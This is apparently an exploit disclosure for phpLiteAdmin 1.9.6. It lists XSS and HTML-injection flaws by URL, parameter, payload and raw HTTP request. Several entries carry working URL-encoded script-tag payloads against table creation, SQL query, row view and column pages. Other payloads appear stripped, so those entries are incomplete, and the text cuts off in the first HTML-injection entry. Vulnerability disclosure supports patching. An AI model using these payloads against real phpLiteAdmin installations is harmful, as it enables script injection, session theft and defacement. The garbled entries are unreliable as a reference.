################################################################################################################################################# # Exploit Title: phpLiteAdmin v1.9.6 - Multiple Vulnerabilities # Date: 20.04.2016 # Exploit Author: Ozer Goker # Vendor Homepage: https://www.phpliteadmin.org # Software Link: https://bitbucket.org/phpliteadmin/public/downloads/phpLiteAdmin_v1-9-6.zip # Version: 1.9.6 ################################################################################################################################################# Introduction phpLiteAdmin is a web-based SQLite database admin tool written in PHP with support for SQLite3 and SQLite2. source = https://www.phpliteadmin.org Vulnerabilities: CSRF | HTML(or Iframe) Injection | XSS XSS details: ################################################################################################################################################# XSS1 URL http://localhost/phpliteadmin/phpliteadmin.php?action=table_create&confirm=1 METHOD Post PARAMETER 0_defaultoption PAYLOAD "> Request POST /phpliteadmin/phpliteadmin.php?action=table_create&confirm=1 HTTP/1.1 tablename=testtable&rows=2&0_field=id&0_type=INTEGER&0_defaultoption=defined">&0_defaultvalue=1&1_field=name&1_type=INTEGER&1_defaultoption=defined&1_defaultvalue=test ################################################################################################################################################# XSS2 URL http://localhost/phpliteadmin/phpliteadmin.php?view=import METHOD Post PARAMETER file PAYLOAD "> Request POST /phpliteadmin/phpliteadmin.php?view=import HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------1675024292505 Content-Length: 1124 -----------------------------1675024292505 Content-Disposition: form-data; name="import_type" sql -----------------------------1675024292505 Content-Disposition: form-data; name="single_table" testtable -----------------------------1675024292505 Content-Disposition: form-data; name="import_csv_fieldsterminated" ; -----------------------------1675024292505 Content-Disposition: form-data; name="import_csv_fieldsenclosed" " -----------------------------1675024292505 Content-Disposition: form-data; name="import_csv_fieldsescaped" \ -----------------------------1675024292505 Content-Disposition: form-data; name="import_csv_replacenull" NULL -----------------------------1675024292505 Content-Disposition: form-data; name="import_csv_fieldnames" on -----------------------------1675024292505 Content-Disposition: form-data; name="file"; filename="test" Content-Type: text/plain "> -----------------------------1675024292505 Content-Disposition: form-data; name="import" Import -----------------------------1675024292505-- ################################################################################################################################################# XSS3 URL http://localhost/phpliteadmin/phpliteadmin.php?view=sql METHOD Post PARAMETER queryval PAYLOAD "> Request POST /phpliteadmin/phpliteadmin.php?view=sql HTTP/1.1 queryval=%22%3E%3Cscript%3Ealert%283%29%3C%2Fscript%3E&delimiter=%3B&query=Go ################################################################################################################################################# XSS4 URL http://localhost/phpliteadmin/phpliteadmin.php?action=view_create&confirm=1 METHOD Post PARAMETER select PAYLOAD "> Request POST /phpliteadmin/phpliteadmin.php?action=view_create&confirm=1 HTTP/1.1 viewname=test&select=">&createtable=Go ################################################################################################################################################# XSS5 URL http://localhost/phpliteadmin/phpliteadmin.php?action=view_drop&confirm=1 METHOD Post PARAMETER viewname PAYLOAD Request POST /phpliteadmin/phpliteadmin.php?action=view_drop&confirm=1 HTTP/1.1 viewname=test ################################################################################################################################################# XSS6 URL http://localhost/phpliteadmin/phpliteadmin.php?action=row_view&table=testtable METHOD Post PARAMETER numRows PAYLOAD '> Request POST /phpliteadmin/phpliteadmin.php?action=row_view&table=testtable HTTP/1.1 show=Show+%3A+&numRows=30%27%3E%3Cscript%3Ealert%286%29%3C%2Fscript%3E&startRow=0&viewtype=table ################################################################################################################################################# XSS7 URL http://localhost/phpliteadmin/phpliteadmin.php?table=testtable&action=column_confirm&action2=%27%3E%3Cscript%3Ealert%287%29%3C/script%3E&pk=id METHOD Get PARAMETER action2 PAYLOAD '> ################################################################################################################################################# XSS8 URL http://localhost/phpliteadmin/phpliteadmin.php?action=table_create&confirm=1 METHOD Post PARAMETER tablename PAYLOAD %3cscript%3ealert(8)%3c%2fscript%3e Request POST /phpliteadmin/phpliteadmin.php?action=table_create&confirm=1 HTTP/1.1 tablename=testtable%3cscript%3ealert(8)%3c%2fscript%3e&rows=2&0_field=id&0_type=INTEGER&0_defaultoption=defined&0_defaultvalue=1&1_field=name&1_type=INTEGER&1_defaultoption=defined&1_defaultvalue=test ################################################################################################################################################# XSS9 URL http://localhost/phpliteadmin/phpliteadmin.php?action=table_rename&confirm=1 METHOD Post PARAMETER oldname PAYLOAD Request POST /phpliteadmin/phpliteadmin.php?action=table_rename&confirm=1 HTTP/1.1 oldname=testtable&newname=test&rename=Rename ################################################################################################################################################# HTML Injection details: ################################################################################################################################################# HTML Injection1 URL http://localhost/phpliteadmin/phpliteadmin.php?action=table_create&confirm=1 METHOD Post PARAMETER 0_defaultoption PAYLOAD ">